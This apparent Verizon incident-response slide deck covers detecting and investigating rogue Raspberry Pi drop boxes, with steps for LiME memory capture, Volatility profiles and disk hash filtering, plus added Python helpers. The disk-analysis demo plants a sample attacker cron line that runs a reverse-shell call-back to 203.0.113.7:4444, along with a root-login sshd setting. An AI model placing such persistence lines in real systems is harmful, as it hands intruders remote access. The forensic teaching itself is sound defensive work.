Just Quickly... Who We Are



The Verizon RISK Team

- Incident Response
  - All technologies and networks
  - Industrial Control Systems
  - Mobile devices
- Full forensic services
- Rapid Response Retainer
  - In-house IR training
  - Mock incidents and incident readiness
- Cyber security intelligence
- eDiscovery
- Investigative Response
- Lab / protected storage
- Areas of expertise
DATA BREACH INVESTIGATIONS REPORT

Data security report for six years.

Over 47,000 security incidents and 621 confirmed data breach incidents.

Turns data into useful, actionable information.

Download the full 2013 DBIR: verizonenterprise.com/dbir/2013
What Aren't Drop Boxes?

- PWN Plug: $1000

What Are They Then?

- Raspberry Pi: $35
- Android implementations: $25-$50
- BeagleBoard: $45
Threat = "Pen Test" Distros

PwnPi and Kali Linux (formerly BackTrack)

Debian-based "pen testing" distros with hundreds of tools across categories:

- Information gathering
- IDS/IPS identification
- Vulnerability assessment
- Exploitation
- Privilege escalation
- Maintaining access
- Stress testing
Variety of Misuse* Actions (overall)

[Chart: bar chart of misuse action varieties from the 2013 DBIR. Labels, with the percentage that sits next to each in the extraction:]

- Privilege abuse (top bar; its value is not attached in the extraction. Stray values of 61% and 2% appear elsewhere in the chart residue.)
- Unapproved hardware: 41%
- Embezzlement: 37%
- Data mishandling: 10%
- Knowledge abuse: 9%
- Unapproved workaround: 4%
- E-mail misuse: 4%
- Net misuse: 3%
- Unknown: 3%
- Unapproved software: 1%
- Illicit content: 1%
- Other: 1%

What is the Risk?

[Chart: breakdown by actor motive, legend Financial / Espionage / Other. The label "Large" and a value of 87% survive from the residue.]

* Misuse accounts for 13% of data breaches in the 2013 DBIR.
What is the Risk? Vector For Misuse (overall)

[Chart: vectors for misuse actions, legend Financial / Espionage / Other. Labels: Physical access, LAN access, Remote access, Unknown, Non-corporate (3%). A value of 61% is unattached in the extraction.]
Do I have one on my network?

Detection techniques:

- Segment networks and add security monitoring
  - Know your attacker and identify the highest-risk assets.
  - Segment those assets.
  - Monitor and investigate unauthorized access attempts from within other network segments.
- Deploy rogue system detection
  - New devices are flagged with switch and port number for admin review.
- Carry out physical audits, prioritizing high-risk areas
  - Public areas, meeting rooms, printers, and the inside of devices.
- Adopt a default port-down policy (unused switch ports stay disabled until an asset is registered for them)
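As an added example (not code from the deck or from any vendor product), the rogue-system-detection step above in Python: it reads a switch's MAC address table, compares each entry against an asset inventory, and flags anything unknown together with the switch and port it appeared on. It goes one step beyond the slide by also flagging any MAC whose OUI belongs to the Raspberry Pi Foundation (b8:27:eb). The table text (in the shape of a Cisco IOS "show mac address-table" listing), the switch name core-sw1 and the inventory entries are constructed sample data.

```python
"""Rogue-system detection over a switch MAC table (added example, not from the deck)."""
import re

# Raspberry Pi Foundation OUI (first three octets of the MAC address).
RASPBERRY_PI_OUI = "b8:27:eb"

# Constructed sample: a MAC address table pulled from the switch.
SAMPLE_MAC_TABLE = """\
Vlan    Mac Address       Type        Ports
----    -----------       --------    -----
  10    0050.56a1.0001    DYNAMIC     Gi1/0/3
  10    b827.eb12.3456    DYNAMIC     Gi1/0/17
  20    001c.c44f.9a10    DYNAMIC     Gi1/0/8
  20    dead.beef.0001    STATIC      Gi1/0/24
"""

# Constructed asset inventory: approved MAC -> asset tag, as a CMDB would hold it.
INVENTORY = {
    "00:50:56:a1:00:01": "VM-HOST-01",
    "00:1c:c4:4f:9a:10": "PRINTER-2F",
}

_CISCO_MAC = re.compile(r"^[0-9a-f]{4}\.[0-9a-f]{4}\.[0-9a-f]{4}$")


def normalize_mac(raw):
    """Turn 'aabb.ccdd.eeff' or 'AA-BB-CC-DD-EE-FF' into 'aa:bb:cc:dd:ee:ff'."""
    hexdigits = re.sub(r"[^0-9a-f]", "", raw.lower())
    if len(hexdigits) != 12:
        raise ValueError("not a MAC address: %r" % raw)
    return ":".join(hexdigits[i:i + 2] for i in range(0, 12, 2))


def parse_mac_table(text, switch):
    """Yield one dict (switch, vlan, mac, port) per data row of the listing."""
    for line in text.splitlines():
        fields = line.split()
        if len(fields) != 4 or not _CISCO_MAC.match(fields[1].lower()):
            continue  # header, separator or malformed row
        yield {"switch": switch, "vlan": int(fields[0]),
               "mac": normalize_mac(fields[1]), "port": fields[3]}


def find_rogues(entries, inventory):
    """Return the entries that need admin review, each annotated with why."""
    rogues = []
    for e in entries:
        reasons = []
        if e["mac"] not in inventory:
            reasons.append("not in asset inventory")
        if e["mac"].startswith(RASPBERRY_PI_OUI):
            reasons.append("Raspberry Pi Foundation OUI")
        if reasons:
            rogues.append(dict(e, reasons=reasons))
    return rogues


def report(switch="core-sw1", table=SAMPLE_MAC_TABLE, inventory=INVENTORY):
    """One line per finding, in the 'switch and port for admin review' shape."""
    rogues = find_rogues(parse_mac_table(table, switch), inventory)
    return ["%s port %s vlan %d: %s (%s)" % (r["switch"], r["port"], r["vlan"],
                                             r["mac"], "; ".join(r["reasons"]))
            for r in rogues]


if __name__ == "__main__":
    for line in report():
        print(line)
```

The inventory match is on the MAC alone, which is what a real attacker will spoof first; treat a hit on the Pi OUI as strong, and a clean inventory match as only weak, evidence. The port is the part that matters for the physical audit that follows.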






Reference: SANS Institute InfoSec Reading Room, "Detecting and Preventing Rogue Devices on the Network" (copyright SANS Institute).

Confidential and proprietary materials for authorized Verizon personnel and outside agencies only. Use, disclosure or distribution of this material is not permitted to any unauthorized persons or third parties except by written agreement.



"Wait by the river long enough and your breach will float by"

[Chart: breach count by discovery method]
So you find one... now what?

Now that we are dealing with physical evidence, a whole new range of considerations comes into play:

- Fingerprints
- CCTV footage
- Documentary evidence of contractor / visitor access
- Serial numbers (limited manufacture and distribution)
- cat /proc/cpuinfo (the ARM SoC serial number* is unique)
- ifconfig (the MAC address* is unique)
- SIM card ICCID (linked to identity, address and credit card)

* Bear in mind that the OS could be misrepresenting these: a MAC address is trivially changed in software, so also record the MAC the switch saw on the port and the markings printed on the board itself.
Know Thine Enemy

Identify the device:

- Read circuit board text
- Read chip numbers
- Identify the IP in use
- Port / vulnerability scan
- Connect to it
  - HDMI
  - Composite video
  - SSH
- Reach out to the security community
What you should know by now.

Hardware info: Raspberry Pi vB
O/S: Linux
Distro: Debian GNU/Linux 7.0 (wheezy)
Platform: armv6l
Kernel version: 3.2.27+
Hostname: pwnpi
IP: 10.1.2.3
Containment

Monitoring:
- TAP / port mirror
- PCAPs
- Border security devices

Get this thing off my network!
- DNS black hole
- Migrate (move it onto a quarantined segment where it can be watched)
- Complete disconnect

Preservation

Volatile data:
- System memory
- Volatile system info

Non-volatile data:
- Use a write blocker
- Use a forensic boot disk

Now What?

Analysis

Volatile data:
- Volatility

Non-volatile data:
- Standard forensic tools

* Consider the power source: pulling the plug (or the USB or PoE feed that powers the device) destroys RAM before you can acquire it, so acquire memory first.
History Lesson

Before: dd /dev/mem

- Broken in newer kernels (access to RAM through /dev/mem is restricted by CONFIG_STRICT_DEVMEM)
- Memory offset issues
- Memory size restrictions
- Lots of context switches and memory loss due to overwriting free pages

root@pwnpi:/# cat /proc/iomem
00000000-1effffff : System RAM
  00008000-004c0e77 : Kernel text
  004e2000-005b5127 : Kernel data
20000000-20000fff : bcm2708_vcio
20003000-20003fff : bcm2708_systemtimer
20006000-20006fff : bcm2708_usb
  20006000-20006fff : dwc_otg
20007000-20007fff : bcm2708_dma.0
Memory Acquisition

LiME - Linux Memory Extractor

- First announced at ShmooCon 2012
- Loadable kernel module (LKM)
- Operates only in the kernel
- Widely supported
  - Typical *nix support
  - ARM support
  - Android support
- Small memory footprint

Project page (at the time): code.google.com/p/lime-forensics/, offering two downloads: LiME Documentation 1.1 (PDF) and lime-forensics-1.1-r17.tar.gz (source + documentation).
Getting Ready

You need to compile a LiME binary for your memory acquisition, against the exact kernel version and architecture running on the device:

- Virtualise* a pentest OS and compile
- Virtualise* the same kernel / architecture
- Buy / borrow / steal the same device and compile on the physical device

Future possibility:

- dd the SD card and virtualise it using LiveView
- vPi project (VMware virtualisation)

* Requires the QEMU ARM emulator. See XEC Design, "QEMU - Emulating Raspberry Pi the easy way (Linux or Windows!)", which shows how to emulate the system the quick and easy way; read its assumptions and follow the instructions carefully. Its note on QEMU and ARM1176: if you did not compile QEMU yourself from git, or download fairly recent binaries, replace -cpu arm1176 with -cpu arm1136-r2 whenever you see it. Note that you will be missing out on many important bug fixes and a few unimportant CPU features.
TIPS

Toto, we're not in x86 land any more!!

Download the correct kernel headers (i.e. for PwnPi's 3.2.27+ kernel; confirm the release with uname -r on the device, the module will not load against anything else):

$ cd /usr/src
$ wget http://repo.anconafamily.com/repos/apt/raspbian/pool/main/l/linux-upstream/linux-headers-3.2.27+_3.2.27+-3_armhf.deb
# dpkg -i linux-headers-3.2.27+_3.2.27+-3_armhf.deb

- Symlink /lib/modules/3.2.27+/build to /usr/src/linux-headers-3.2.27+:
  # ln -s /usr/src/linux-headers-3.2.27+ /lib/modules/3.2.27+/build
- Compile LiME (from the src directory of the unpacked tarball):
  $ cd <lime source>/src && make
LiME Options

path
- Either a file path ("path=<path>", e.g. on removable media) or a TCP port to listen on and push the memory out through ("path=tcp:<port>")

format
- raw: concatenates the System RAM segments together, dropping the gaps between them (and with them the physical addresses)
- padded: inserts zeros for the gaps between memory segments, so file offsets equal physical addresses
- lime: prefixes each segment with a header carrying its physical address range (best for Volatility)

dio - direct I/O
- Bypasses the kernel page cache to write directly to the media (enabled by default; dio=0 turns it off)
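The following is an added example, not LiME's own code, covering both the /proc/iomem listing on the History Lesson slide and the three output formats above. It parses the top-level System RAM ranges out of an iomem listing (LiME dumps only those, never the device registers at 0x20000000), computes how large the raw, padded and lime outputs would be, and packs and walks the per-range header that format=lime writes (the 32-byte layout from LiME's lime.h: magic 0x4C694D45, which appears on disk as the bytes "EMiL", version 1, 64-bit start and end addresses, 8 reserved bytes). The iomem text is constructed with two RAM ranges so that the gap handling is visible; the Pi in the deck has only one.

```python
"""System RAM map parsing and LiME output-format layout (added example, not LiME's code)."""
import struct

LIME_MAGIC = 0x4C694D45                  # 'LiME' as a little-endian u32; on disk "EMiL"
LIME_VERSION = 1
LIME_HEADER = struct.Struct("<IIQQ8s")   # magic, version, s_addr, e_addr, reserved

# Constructed iomem listing: the Pi's single range plus a second range to show a gap.
SAMPLE_IOMEM = """\
00000000-1effffff : System RAM
  00008000-004c0e77 : Kernel text
  004e2000-005b5127 : Kernel data
20000000-20000fff : bcm2708_vcio
30000000-3fffffff : System RAM
"""


def parse_system_ram(iomem_text):
    """[(start, end)] for top-level 'System RAM' lines; end is inclusive."""
    ranges = []
    for line in iomem_text.splitlines():
        if line.startswith(" ") or not line.endswith(": System RAM"):
            continue  # nested child resource, or a device region
        span, _ = line.split(" : ", 1)
        start, end = (int(x, 16) for x in span.split("-"))
        ranges.append((start, end))
    return ranges


def format_sizes(ranges):
    """Bytes written by each LiME format for the given RAM ranges."""
    raw = sum(end - start + 1 for start, end in ranges)
    padded = ranges[-1][1] + 1 if ranges else 0     # zeros fill every gap from address 0
    lime = raw + LIME_HEADER.size * len(ranges)     # one 32-byte header per range
    return {"raw": raw, "padded": padded, "lime": lime}


def lime_range_header(start, end):
    """Pack the header LiME writes in front of each range in format=lime."""
    return LIME_HEADER.pack(LIME_MAGIC, LIME_VERSION, start, end, b"\0" * 8)


def parse_lime_header(blob):
    """(start, end) from a header; raises if magic or version is wrong."""
    magic, version, start, end, _ = LIME_HEADER.unpack(blob[:LIME_HEADER.size])
    if magic != LIME_MAGIC or version != LIME_VERSION:
        raise ValueError("not a LiME range header")
    return start, end


def walk_lime_image(blob):
    """Yield (start, end, payload) per range of a format=lime image, checking
    that ranges ascend and that every payload is complete (a truncated
    acquisition is the usual failure when the device loses power)."""
    off, prev_end = 0, -1
    while off < len(blob):
        start, end = parse_lime_header(blob[off:off + LIME_HEADER.size])
        if start <= prev_end:
            raise ValueError("ranges out of order at offset %d" % off)
        off += LIME_HEADER.size
        size = end - start + 1
        payload = blob[off:off + size]
        if len(payload) != size:
            raise ValueError("truncated image: range %#x-%#x" % (start, end))
        yield start, end, payload
        off += size
        prev_end = end


if __name__ == "__main__":
    rs = parse_system_ram(SAMPLE_IOMEM)
    print(["%#x-%#x" % r for r in rs], format_sizes(rs))
```

Running walk_lime_image over an acquired Pi_Memory.lime (after hashing it) is a cheap check that the transfer completed and that the header addresses match what /proc/iomem on the device reported.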
Getting the Job Done

Network acquisition

- Copy lime.ko to the Pi (e.g. with WinSCP or scp)
- Execute on the Pi (the module blocks, listening for the collector): # insmod <path>/lime.ko "path=tcp:666 format=lime"
- Collect on the workstation: $ nc <Pi IP address> 666 > Pi_Memory.lime
- Hash the image as soon as the transfer ends: $ sha256sum Pi_Memory.lime

Local acquisition

- Copy lime.ko to a USB flash drive and mount it on the Pi, so nothing is written to the SD card under investigation
- Execute LiME: # insmod <path>/lime.ko "path=<path on the USB drive> format=lime"
Pray to Demo Gods



DEMO TIME 
For Android

Android Debug Bridge (ADB)

- Put the device into USB debug mode
  - Sometimes requires special cables
  - Can be a problem if security policies have disabled USB debug mode
  - Can require a reboot, which is pointless: the reboot wipes the RAM you wanted to acquire
- Use a USB flash drive and write to USB
- Acquire the SD card first, then copy lime.ko to the SD card and write memory to the card

$ adb push <path>/lime.ko /sdcard/lime.ko
$ adb forward tcp:666 tcp:666
$ adb shell
# insmod /sdcard/lime.ko "path=tcp:666 format=lime"

Then, on the workstation, read the forwarded port: $ nc localhost 666 > android.lime
Collect other volatile data:

- Uptime: great intel as to when the attacker installed the device; correlate with:
  - CCTV
  - Employee access card logs
  - Keysafe logs
  - Contractor / visitor logs
- Date: determine the accuracy of the system clock (compare it against a trusted time source before trusting any timestamp the device produced)
- netstat -anp (the Linux equivalent of the Windows netstat -nao: sockets with PIDs and owning programs)

Unplug and image the SD card, or dd it in place.
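An added example (not from the deck) that turns the uptime and clock checks above into something the CCTV and badge-log reviewers can use, and also pulls the serial from the /proc/cpuinfo capture mentioned on the "So you find one" slide. It takes the three values a responder notes at the console (the output of cat /proc/uptime, the device's date +%s, and the responder's trusted time read at the same moment), derives the clock offset, and converts the boot instant into trusted wall-clock time with a tolerance window. Every input here is constructed; the 15-minute slack is an assumed default.

```python
"""Install window from uptime, corrected for clock skew (added example, not from the deck)."""
from datetime import datetime, timedelta, timezone

# Constructed captures from the console session on the suspect Pi.
SAMPLE_UPTIME = "1209645.32 2419101.11\n"   # /proc/uptime: seconds up, seconds idle
SAMPLE_DEVICE_EPOCH = 1370000000             # `date +%s` on the device
SAMPLE_TRUSTED_EPOCH = 1370003600            # responder's NTP-synced clock at the same moment
SAMPLE_CPUINFO = """\
Processor\t: ARMv6-compatible processor rev 7 (v6l)
BogoMIPS\t: 697.95
Hardware\t: BCM2708
Revision\t: 000f
Serial\t\t: 00000000a1b2c3d4
"""


def parse_uptime(text):
    """Seconds since boot: the first field of /proc/uptime."""
    return float(text.split()[0])


def clock_offset(device_epoch, trusted_epoch):
    """Seconds the device clock is behind (positive) or ahead (negative) of trusted time."""
    return trusted_epoch - device_epoch


def boot_window(uptime_text, device_epoch, trusted_epoch, slack=timedelta(minutes=15)):
    """(earliest, latest, boot) in trusted UTC time.

    The boot instant is trusted_now minus uptime, so the device clock does not
    enter that subtraction at all. The offset still matters: file timestamps on
    the SD card were written with the skewed clock and must be shifted by it.
    """
    trusted_now = datetime.fromtimestamp(trusted_epoch, tz=timezone.utc)
    boot = trusted_now - timedelta(seconds=parse_uptime(uptime_text))
    return boot - slack, boot + slack, boot


def cpuinfo_field(text, name):
    """Value of a 'Name : value' line from /proc/cpuinfo, or None if absent."""
    for line in text.splitlines():
        key, sep, value = line.partition(":")
        if sep and key.strip() == name:
            return value.strip()
    return None


def triage_summary(uptime_text=SAMPLE_UPTIME, device_epoch=SAMPLE_DEVICE_EPOCH,
                   trusted_epoch=SAMPLE_TRUSTED_EPOCH, cpuinfo=SAMPLE_CPUINFO):
    """What to hand to the people pulling CCTV, badge and visitor logs."""
    earliest, latest, boot = boot_window(uptime_text, device_epoch, trusted_epoch)
    return {
        "hardware": cpuinfo_field(cpuinfo, "Hardware"),
        "serial": cpuinfo_field(cpuinfo, "Serial"),
        "clock_offset_s": clock_offset(device_epoch, trusted_epoch),
        "boot_utc": boot.isoformat(),
        "window_utc": (earliest.isoformat(), latest.isoformat()),
    }


if __name__ == "__main__":
    for key, value in triage_summary().items():
        print("%-16s %s" % (key, value))
```

Uptime only dates the last power-on; if the attacker's battery or PoE feed dropped once, the real install is earlier, which is why the window goes to the log reviewers as a starting point rather than a fact.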
Memory Analysis

Analysis is relatively straightforward.

- Linux memory analysis in the Volatility Framework
  - Need to create a profile for each device (one per kernel build)
- apt-get install dwarfdump (and gcc/make + kernel headers)
- Check out the Volatility source code
- Make the dwarf file:
  $ cd volatility/tools/linux
  $ make
  $ head module.dwarf
- Get the System.map file (from /boot, for the running kernel)
- Place both module.dwarf and System.map into a zip file.... now you have your profile (it goes in volatility/plugins/overlays/linux/)
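An added example (not Volatility's code) that assembles the profile zip described above and checks its two inputs first. The usual way this step fails is pairing a module.dwarf or System.map from a different kernel build than the one in the image, so the helper refuses to build unless the map carries the symbols Volatility's Linux plugins start from (init_task, swapper_pg_dir) and the dwarf output describes task_struct and mm_struct. The System.map and dwarfdump excerpts are constructed stand-ins for files that are really thousands of lines long.

```python
"""Assemble and sanity-check a Volatility 2.x Linux profile (added example, not Volatility's code)."""
import io
import re
import zipfile

REQUIRED_MAP_SYMBOLS = ("init_task", "swapper_pg_dir")   # used by Volatility's Linux support
REQUIRED_DWARF_TYPES = ("task_struct", "mm_struct")        # struct layouts the plugins rely on

# Constructed stand-ins for the real System.map and dwarfdump output.
SAMPLE_SYSTEM_MAP = """\
c0008000 T stext
c0449a68 D init_task
c04b4000 D swapper_pg_dir
"""
SAMPLE_MODULE_DWARF = """\
DW_TAG_structure_type
  DW_AT_name "task_struct"
  DW_AT_byte_size 0x000004a0
DW_TAG_structure_type
  DW_AT_name "mm_struct"
  DW_AT_byte_size 0x00000178
"""

_MAP_LINE = re.compile(r"^([0-9a-fA-F]+)\s+(\S)\s+(\S+)$")


def parse_system_map(text):
    """{symbol: address} from 'address type name' lines."""
    symbols = {}
    for line in text.splitlines():
        m = _MAP_LINE.match(line.strip())
        if m:
            symbols[m.group(3)] = int(m.group(1), 16)
    return symbols


def check_system_map(text):
    """(symbols, missing required symbols)."""
    symbols = parse_system_map(text)
    return symbols, [s for s in REQUIRED_MAP_SYMBOLS if s not in symbols]


def check_module_dwarf(text):
    """Required struct names absent from the dwarfdump output."""
    names = set(re.findall(r'DW_AT_name\s+"([^"]+)"', text))
    return [t for t in REQUIRED_DWARF_TYPES if t not in names]


def build_profile(module_dwarf, system_map, kernel_release):
    """Bytes of the profile zip; raises ValueError if either input looks wrong."""
    missing_syms = check_system_map(system_map)[1]
    missing_types = check_module_dwarf(module_dwarf)
    if missing_syms or missing_types:
        raise ValueError("profile inputs incomplete: symbols %s, types %s"
                         % (missing_syms, missing_types))
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("module.dwarf", module_dwarf)
        zf.writestr("System.map-%s" % kernel_release, system_map)
    return buf.getvalue()


def profile_members(zip_bytes):
    """Sorted member names, for confirming what went into the zip."""
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        return sorted(zf.namelist())


if __name__ == "__main__":
    with open("PwnPi.zip", "wb") as f:
        f.write(build_profile(SAMPLE_MODULE_DWARF, SAMPLE_SYSTEM_MAP, "3.2.27+"))
    print(profile_members(open("PwnPi.zip", "rb").read()))
```

Name the zip after the device (Volatility 2.x derives the profile name from the zip's basename and the architecture) and keep one per kernel build; a profile from a 3.2.27+ PwnPi is useless against a box running anything else.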
Interesting Things

Things you can do:

- linux_pslist: list all processes and their offsets
- linux_pstree: list parent / child relationships (i.e. you should see bash spawned from sshd)
- linux_psaux: process arguments
- linux_proc_maps: map out a process's memory space
- linux_dump_map: get the binary and its static data (great for binary reversing)
- Kernel objects, debug buffer (dmesg), kernel memory caches
- Recover the ARP table, ifconfig, routing cache, netstat output, per-socket packet queues
Disk Analysis

- Disk analysis in your tool of choice (open source / EnCase / FTK)
  - Hash all files in the pristine distro image and use the set as a filter, so only files the attacker added or modified remain
  - grep for IPs
  - Timeline analysis
  - Reverse any interesting binaries
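An added example (not from the deck or from any forensic suite) of the first two steps: build a known-good hash set from a pristine copy of the distro, walk the suspect SD card mount keeping only files whose SHA-256 is not in that set, and grep the survivors for IPv4 addresses, the quickest route to a call-back address. Both trees, the attacker's cron job and the 203.0.113.7 address in it are constructed in a temporary directory so the example runs offline.

```python
"""Known-good hash filter and IP grep over a mounted image (added example, not from the deck)."""
import hashlib
import os
import re
import tempfile

IPV4 = re.compile(rb"\b(?:(?:25[0-5]|2[0-4]\d|1?\d?\d)\.){3}(?:25[0-5]|2[0-4]\d|1?\d?\d)\b")


def sha256_file(path):
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 20), b""):
            h.update(chunk)
    return h.hexdigest()


def build_hashset(root):
    """SHA-256 digests of every regular file under root (the pristine distro)."""
    digests = set()
    for dirpath, _, files in os.walk(root):
        for name in files:
            p = os.path.join(dirpath, name)
            if os.path.isfile(p) and not os.path.islink(p):
                digests.add(sha256_file(p))
    return digests


def unknown_files(suspect_root, known):
    """Relative paths under suspect_root whose content is not in the known set."""
    out = []
    for dirpath, _, files in os.walk(suspect_root):
        for name in files:
            p = os.path.join(dirpath, name)
            if os.path.islink(p) or not os.path.isfile(p):
                continue
            if sha256_file(p) not in known:
                out.append(os.path.relpath(p, suspect_root))
    return sorted(out)


def grep_ips(root, paths):
    """{relative path: sorted unique IPv4 strings} for files that contain any."""
    hits = {}
    for rel in paths:
        with open(os.path.join(root, rel), "rb") as f:
            found = {m.decode() for m in IPV4.findall(f.read())}
        if found:
            hits[rel] = sorted(found)
    return hits


def _write(root, rel, data):
    p = os.path.join(root, rel)
    os.makedirs(os.path.dirname(p), exist_ok=True)
    with open(p, "wb") as f:
        f.write(data)


def demo():
    """Constructed pristine and suspect trees; returns (unknown files, IP hits)."""
    with tempfile.TemporaryDirectory() as tmp:
        pristine, suspect = os.path.join(tmp, "pristine"), os.path.join(tmp, "suspect")
        for root in (pristine, suspect):                # files shipped by the distro
            _write(root, "etc/hostname", b"pwnpi\n")
            _write(root, "usr/bin/nmap", b"\x7fELF untouched nmap\n")
        # attacker's additions: a cron-driven call-back and an edited sshd config
        _write(suspect, "etc/cron.d/update",
               b"*/5 * * * * root /usr/local/bin/rs 203.0.113.7 4444\n")
        _write(suspect, "etc/ssh/sshd_config", b"Port 2222\nPermitRootLogin yes\n")
        known = build_hashset(pristine)
        unknown = unknown_files(suspect, known)
        return unknown, grep_ips(suspect, unknown)


if __name__ == "__main__":
    print(demo())
```

Hashing content rather than paths means a renamed but unmodified distro file drops out of the review set, while a distro file the attacker edited in place stays in it, which is the behaviour you want from a filter.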
Don't forget your other big problem.

You've only discovered one slice of the Pi.

Verizon RISK Team

In case of an incident, contact us 24/7 worldwide: 

Phone: +1.877.330.0465 

Email: ir-global@verizon.com 